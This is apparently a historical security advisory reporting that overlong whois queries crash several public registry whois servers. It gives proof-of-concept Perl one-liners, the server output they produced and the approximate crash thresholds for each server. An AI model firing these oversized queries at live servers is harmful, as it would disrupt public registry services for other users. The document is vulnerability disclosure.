COMMAND

    whois

SYSTEMS AFFECTED

    Linux

PROBLEM

    Michal  Zalewski  found  following.   In  following example (which
    works only with  Linux version of  'whois' command -  *BSD version
    has  built-in  query  size  limits),  replace joshua.ripe.net with
    your favourite - whois.arin.net or whois.radb.net...

        [lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 10000}'`@joshua.ripe.net
        [joshua.ripe.net]

        % Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
        % No entries found for the selected source(s).
        %
        % If you would like to search on arbitrary strings,
        % please see the Database page on the RIPE NCC
        % web-site at http://www.ripe.net/ripencc/pub-services/db/
        % This will only work for RIPE data.
        %
        % Please note that RIPE whoisd service temporarily
        % does not mirror RADB and CW databases. Please query
        % these databases directly at:
        % whois.radb.net for RADB and
        % whois.cw.net for CW.

        [lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 20000}'`@joshua.ripe.net
        [joshua.ripe.net]

        % Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
        [lcamtuf@www lcamtuf]$

    For whois.arin.net  and whois.radb.net,  the 'magic  point' is  at
    about 248 bytes of query sent. whois.ripe.net seems to panic  with
    buffer larger  than 30k,  but only  with specific  sequences (like
    "0.0.0"...).  whois.cw.net can stand even 80-90kB before  crashing
    sessions.  InterNIC seems to   have similar problems as our  other
    Big Friends...

        [root@nimue:4 lcamtuf]# whois `perl -e '{print ".0" x 250}'`@rs.internic.net
        [rs.internic.net]

        Whois Server Version 1.1

        Domain names in the .com, .net, and .org domains can now be registered
        with many different competing registrars. Go to http://www.internic.net
        for detailed information.

        No match for nameserver
        "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0".

        >>> Last update of whois database: Wed, 2 Feb 00 02:26:48 EST <<<

        The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and Registrars.

        [root@nimue:4 lcamtuf]# whois `perl -e '{print ".0" x 260}'`@rs.internic.net
        [rs.internic.net]

        Whois Server Version 1.1
        [root@nimue:4 lcamtuf]#

    No idea how to explain it - seems just like regular buffer overrun
    in  whoisd  started  from  inetd  (as  it  is suggested).  But, of
    course, we  can't get  sources of  currently running  services, it
    couls be  addressed as  "silent dropping  excessive data  portions
    with  system-dependent  data  amount  limit".   Only  one thing is
    mysterious - whoisd service producess verbose output on any  query
    syntax error  or any  other problem,  except for  that.    And RFC
    don't  mention  maximal  query  length  nor  _any_  situation when
    connection should be silently  dropped.  That's another  reason to
    think whoisd crashed.

SOLUTION

    Nothing yet.